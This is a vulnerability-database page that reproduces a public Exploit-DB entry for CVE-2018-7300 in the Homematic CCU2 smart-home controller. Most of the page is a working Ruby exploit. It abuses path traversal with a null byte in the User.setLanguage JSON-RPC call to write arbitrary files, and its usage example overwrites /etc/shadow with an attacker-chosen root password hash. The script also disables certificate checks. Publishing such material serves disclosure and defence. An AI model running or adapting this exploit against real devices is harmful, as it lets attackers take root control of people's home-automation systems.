Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Homematic CCU2 2.29.23 - Arbitrary File Write

🗓️ 30 Mar 2018 00:00:00Reported by Patrick Muench and Gregor KopfType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 34 Views

Homematic CCU2 Arbitrary File Write exploit allows arbitrary file writes on Homematic CCU2 version 2.29.2

Code
#!/usr/bin/ruby

# Exploit Title: Homematic CCU2 Arbitrary File Write
# Date: 28-03-18
# Exploit Author: Patrick Muench, Gregor Kopf
# Vendor Homepage: http://www.eq-3.de
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
# Version: 2.29.23
# CVE : 2018-7300

# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite

require 'net/http'
require 'net/https'
require 'uri'
require 'json'

unless ARGV.length == 3
  STDOUT.puts <<-EOF
Please provide url

Usage:
  write_files.rb <ip.adress> <file path> <content of the file>

Example:
  write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'

  or

  write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'

EOF
  exit
end

# The first argument specifiee the URL and if http or https is used
url = ARGV[0] + "/api/homematic.cgi"

# The second argument specifies the file into which the content should be written
homematic_file_path = ARGV[1]

# The third argument specifies the content of the file
homematic_file_content = ARGV[2]

# define the json body for the attack
body = {
        "version": "1.1",
        "method": "User.setLanguage",
        "params": {
                    "userName": "file path",
                    "userLang": "file content"
                  }
        }.to_hash

# define the traversal with the file you want to write
body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000"

# define the content
body[:params][:userLang] = homematic_file_content

# split the uri to access it in a easier way
uri = URI.parse(url)

# define target connection, disabling certificate verification
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|

  # define post request
  request = Net::HTTP::Post.new(uri.request_uri)

  # define the content type of the http request
  request.content_type = 'application/json'

  # define the request body
  request.body = body.to_json

  # send the request to the homematic ccu2
  response = http.request(request)

  # print response message code and status to cli
  puts 'Response code: ' + response.code + ' ' + response.message
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Mar 2018 00:00Current
7.4High risk
Vulners AI Score7.4
homematicccu2arbitrary file writeexploitcve-2018-7300remote code executionsecurity vulnerability
34